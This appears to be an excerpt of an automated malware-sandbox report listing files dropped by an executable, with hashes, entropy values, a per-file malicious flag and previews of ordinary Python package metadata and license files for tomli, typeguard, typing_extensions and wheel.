                                                                                                                                                                                                                              MD5:CBBF7047A51FEDA58386E86182B85B8A
                                                                                                                                                                                                                              SHA1:D3EA3BDA227794AE35FE7FFC5BD6E5FA2A5EF250
                                                                                                                                                                                                                              SHA-256:CCF0DC78A98FC0918B5AD67292B1E2C4BED65575A6246CD9D63C914F9942A0F2
                                                                                                                                                                                                                              SHA-512:A994914F1676790730C6BDACA26FE5F1B18BA9A3B9F0D24D708C722424DED255360A0CC88E239C6BFE467BD2763DF7339BB6B760AB090FAE474A7C9C8AFA8948
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: tomli.Version: 2.0.1.Summary: A lil' TOML parser.Keywords: toml.Author-email: Taneli Hukkinen <hukkin@users.noreply.github.com>.Requires-Python: >=3.7.Description-Content-Type: text/markdown.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: MacOS.Classifier: Operating System :: Microsoft :: Windows.Classifier: Operating System :: POSIX :: Linux.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Typing :: Typed.Project-URL: Changelog, https://github.com/hukkin/tomli/blob/master/CHANGELOG.md.Project-URL:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):999
                                                                                                                                                                                                                              Entropy (8bit):5.89030761653127
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4n/2zDRv53Pb4EsJWc6QtD8r8N8bh8WNdop2+oM8+kzAL5+1:4nuXR1Pb45JWc6QmIebKWcpHoM8JMLy
                                                                                                                                                                                                                              MD5:D5FAB61E3DB6B54B51FBA607865C195B
                                                                                                                                                                                                                              SHA1:B94D9126E8FC9D5F29FAFBB67F068E2D111D17FC
                                                                                                                                                                                                                              SHA-256:0CB9F9A451A1E365AC54B4C88662E1DA0CB54A72D16A5258FB0ABFF9D3E1C022
                                                                                                                                                                                                                              SHA-512:ABD3EF61D8D578C1DE609560A6985503E60BD53F90DCFF54EBEE23714D9CD88DBA4036ED19B24EC62B8432550311894FCC47BDCCD7CE4DCDE82518F4E02E123C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:tomli-2.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..tomli-2.0.1.dist-info/LICENSE,sha256=uAgWsNUwuKzLTCIReDeQmEpuO2GSLCte6S8zcqsnQv4,1072..tomli-2.0.1.dist-info/METADATA,sha256=zPDceKmPwJGLWtZykrHixL7WVXWmJGzZ1jyRT5lCoPI,8875..tomli-2.0.1.dist-info/RECORD,,..tomli-2.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..tomli-2.0.1.dist-info/WHEEL,sha256=jPMR_Dzkc4X4icQtmz81lnNY_kAsfog7ry7qoRvYLXw,81..tomli/__init__.py,sha256=JhUwV66DB1g4Hvt1UQCVMdfCu-IgAV8FXmvDU9onxd4,396..tomli/__pycache__/__init__.cpython-312.pyc,,..tomli/__pycache__/_parser.cpython-312.pyc,,..tomli/__pycache__/_re.cpython-312.pyc,,..tomli/__pycache__/_types.cpython-312.pyc,,..tomli/_parser.py,sha256=g9-ENaALS-B8dokYpCuzUFalWlog7T-SIYMjLZSWrtM,22633..tomli/_re.py,sha256=dbjg5ChZT23Ka9z9DHOXfdtSpPwUfdgMXnj8NOoly-w,2943..tomli/_types.py,sha256=-GTG2VUqkpxwMqzmVO4F7ybKddIbAnuAHXfmWQcTi3Q,254..tomli/py.typed,sha256=8PjyZ1aVoQpRVvt71muvuq5qE-jTFZkK-GLHkhdebmc,26..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFMthP+tPCCfA5I:Rt1QqDWBB3
                                                                                                                                                                                                                              MD5:FF39892A240316BD62B5832C03D504BC
                                                                                                                                                                                                                              SHA1:3883FC4406CC9A73BE0B839C1A0C31D3DDD64829
                                                                                                                                                                                                                              SHA-256:8CF311FC3CE47385F889C42D9B3F35967358FE402C7E883BAF2EEAA11BD82D7C
                                                                                                                                                                                                                              SHA-512:B2E57D9C81BBFB7364B8216FC086B8F73C2F2B537E300FB250EFB7972E3908F77A3D504363676C50A195D307822C69EE9B689DE6C48A4E6B8A6BA89A5A99AC32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.6.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                              MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                              SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                              SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                              SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3717
                                                                                                                                                                                                                              Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                              MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                              SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                              SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                              SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                              Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                              MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                              SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                              SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                              SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                              Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                              MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                              SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                              SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                              SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:LEJn:M
                                                                                                                                                                                                                              MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                              SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                              SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                              SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13936
                                                                                                                                                                                                                              Entropy (8bit):5.135214154002924
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:cke8RQ6KSAdxC9ad9iqsibQtKti9zpQpzu9Jkh:K8RQ6q7C9ad9iqT8cti9zpQpzu7kh
                                                                                                                                                                                                                              MD5:FCF6B249C2641540219A727F35D8D2C2
                                                                                                                                                                                                                              SHA1:C6E195F9AA30CC9B675D1612CA4FB7F74111BD35
                                                                                                                                                                                                                              SHA-256:3B2F81FE21D181C499C59A256C8E1968455D6689D269AA85373BFB6AF41DA3BF
                                                                                                                                                                                                                              SHA-512:70367B908204B5922E5D9D2ACE39437DBAA1EEFDAD1797B50CC6E7DCA168D9B59199353BADDDCAEEE12B49D328FC8132F628952383CFE6803CB4F4BF9B9D6D86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:A. HISTORY OF THE SOFTWARE.==========================..Python was created in the early 1990s by Guido van Rossum at Stichting.Mathematisch Centrum (CWI, see https://www.cwi.nl) in the Netherlands.as a successor of a language called ABC. Guido remains Python's.principal author, although it includes many contributions from others...In 1995, Guido continued his work on Python at the Corporation for.National Research Initiatives (CNRI, see https://www.cnri.reston.va.us).in Reston, Virginia where he released several versions of the.software...In May 2000, Guido and the Python core development team moved to.BeOpen.com to form the BeOpen PythonLabs team. In October of the same.year, the PythonLabs team moved to Digital Creations, which became.Zope Corporation. In 2001, the Python Software Foundation (PSF, see.https://www.python.org/psf/) was formed, a non-profit organization.created specifically to own Python-related Intellectual Property..Zope Corporation was a sponsoring member of the PS
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3018
                                                                                                                                                                                                                              Entropy (8bit):5.0579916471633
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DtkCMU2ymXbFX1QI/aMktjaVQEBu+FOK+W6i+qXd0qme28mIp9DvvV+Vz+nlh:DtkCD/mxX1QI/aMktjaVBroBBqd0VODD
                                                                                                                                                                                                                              MD5:8303191AC93E4D32457A4A9E3CDAD8E5
                                                                                                                                                                                                                              SHA1:B6ADA54B9516D20B69A5DD5CDED868DA22C5E252
                                                                                                                                                                                                                              SHA-256:05E51021AF1C9D86EB8D6C7E37C4CECE733D5065B91A6D8389C5690ED440F16D
                                                                                                                                                                                                                              SHA-512:F2F5DBE5EA55ED720FA4191180076E9EFFCB9C811C3C7BF1A1201E9D78590B381E125EAF7B8366B28A03383C2958449423548576605E8DCB5CC11C33C9B0E709
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typing_extensions.Version: 4.12.2.Summary: Backported and Experimental Type Hints for Python 3.8+.Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing.Author-email: "Guido van Rossum, Jukka Lehtosalo, .ukasz Langa, Michael Lee" <levkivskyi@gmail.com>.Requires-Python: >=3.8.Description-Content-Type: text/markdown.Classifier: Development Status :: 5 - Production/Stable.Classifier: Environment :: Console.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Python Software Foundation License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Langua
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):571
                                                                                                                                                                                                                              Entropy (8bit):5.751670348693122
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:rCA89x0a/2zDuxv/vjWaxLbSaLjxjxXaefIE12BATqyo/C:mA87n/2zD6vXCulVZf5Cc4C
                                                                                                                                                                                                                              MD5:B884E8832BFB336C2D7F54271F11EE1C
                                                                                                                                                                                                                              SHA1:5A3BAABEE79E0CF32D2E87C9AF0FBB3AAD8CACAD
                                                                                                                                                                                                                              SHA-256:7710002D81971E632AA6A2FC33DC5D74AAF5D7CAAE22040A65D3E31503B05EE9
                                                                                                                                                                                                                              SHA-512:0A5EB3ABED212C474CB5FDDEF47F8E62DAA130128F2BB368A8E1F12E143DAE2F8B2EF4A9B85A883A03C67195829AD637DB7CF7CC4B41535AF6CA5668F8F2BD0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:__pycache__/typing_extensions.cpython-312.pyc,,..typing_extensions-4.12.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typing_extensions-4.12.2.dist-info/LICENSE,sha256=Oy-B_iHRgcSZxZolbI4ZaEVdZonSaaqFNzv7avQdo78,13936..typing_extensions-4.12.2.dist-info/METADATA,sha256=BeUQIa8cnYbrjWx-N8TOznM9UGW5Gm2DicVpDtRA8W0,3018..typing_extensions-4.12.2.dist-info/RECORD,,..typing_extensions-4.12.2.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..typing_extensions.py,sha256=gwekpyG9DVG3lxWKX4ni8u7nk3We5slG98mA9F3DJQw,134451..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                                              Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                              MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                              SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                              SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                              SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2153
                                                                                                                                                                                                                              Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                              MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                              SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                              SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                              SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
